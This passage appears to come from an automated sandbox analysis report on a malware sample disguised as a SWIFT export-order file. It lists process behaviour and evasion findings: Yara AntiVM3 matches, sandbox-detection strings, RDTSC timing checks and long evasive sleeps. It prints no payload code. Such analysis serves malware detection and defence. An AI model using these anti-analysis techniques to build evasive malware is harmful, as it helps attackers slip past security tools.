Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.2cd9004.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TT_SWIFT_Export Order_noref S10SMG00318021.exe PID: 3456, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000006B8614 second address: 00000000006B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000006B89AE second address: 00000000006B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1064 Thread sleep count: 3989 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1064 Thread sleep count: 4346 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 5664 Thread sleep time: -39327s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239497s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239370s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239263s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239152s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238483s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238150s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238045s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237499s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237171s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236952s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236296s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236152s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236046s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234913s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234682s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234553s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234012s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233898s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233529s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233421s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232980s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232865s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232535s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232395s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232268s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -230891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -230122s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340 Thread sleep count: 7185 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 1300 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004088E0 rdtsc 8_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239828 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239718 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239609 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239497 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239370 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239263 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239152 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239031 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 238921 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 238812 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 238703 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 238593 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: